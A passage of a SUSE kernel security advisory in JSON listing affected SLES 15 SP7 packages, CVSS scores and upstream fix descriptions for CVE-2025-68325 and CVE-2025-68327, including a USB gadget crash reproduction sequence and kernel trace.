"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68327",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68327"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: renesas_usbhs: Fix synchronous external abort on unbind\n\nA synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is\nexecuted after the configuration sequence described above:\n\nmodprobe usb_f_ecm\nmodprobe libcomposite\nmodprobe configfs\ncd /sys/kernel/config/usb_gadget\nmkdir -p g1\ncd g1\necho \"0x1d6b\" \u003e idVendor\necho \"0x0104\" \u003e idProduct\nmkdir -p strings/0x409\necho \"0123456789\" \u003e strings/0x409/serialnumber\necho \"Renesas.\" \u003e strings/0x409/manufacturer\necho \"Ethernet Gadget\" \u003e strings/0x409/product\nmkdir -p functions/ecm.usb0\nmkdir -p configs/c.1\nmkdir -p configs/c.1/strings/0x409\necho \"ECM\" \u003e configs/c.1/strings/0x409/configuration\n\nif [ ! -L configs/c.1/ecm.usb0 ]; then\n ln -s functions/ecm.usb0 configs/c.1\nfi\n\necho 11e20000.usb \u003e UDC\necho 11e20000.usb \u003e /sys/bus/platform/drivers/renesas_usbhs/unbind\n\nThe displayed trace is as follows:\n\n Internal error: synchronous external abort: 0000000096000010 [#1] SMP\n CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT\n Tainted: [M]=MACHINE_CHECK\n Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT)\n pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs]\n lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs]\n sp : ffff8000838b3920\n x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810\n x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000\n x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020\n x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344\n x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000\n x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418\n x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d\n x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80\n Call trace:\n usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P)\n usbhsg_pullup+0x4c/0x7c [renesas_usbhs]\n usb_gadget_disconnect_locked+0x48/0xd4\n gadget_unbind_driver+0x44/0x114\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_release_driver+0x18/0x24\n bus_remove_device+0xcc/0x10c\n device_del+0x14c/0x404\n usb_del_gadget+0x88/0xc0\n usb_del_gadget_udc+0x18/0x30\n usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs]\n usbhs_mod_remove+0x20/0x30 [renesas_usbhs]\n usbhs_remove+0x98/0xdc [renesas_usbhs]\n platform_remove+0x20/0x30\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_driver_detach+0x18/0x24\n unbind_store+0xb4/0xb8\n drv_attr_store+0x24/0x38\n sysfs_kf_write+0x7c/0x94\n kernfs_fop_write_iter+0x128/0x1b8\n vfs_write+0x2ac/0x350\n ksys_write+0x68/0xfc\n __arm64_sys_write+0x1c/0x28\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0xc0/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: 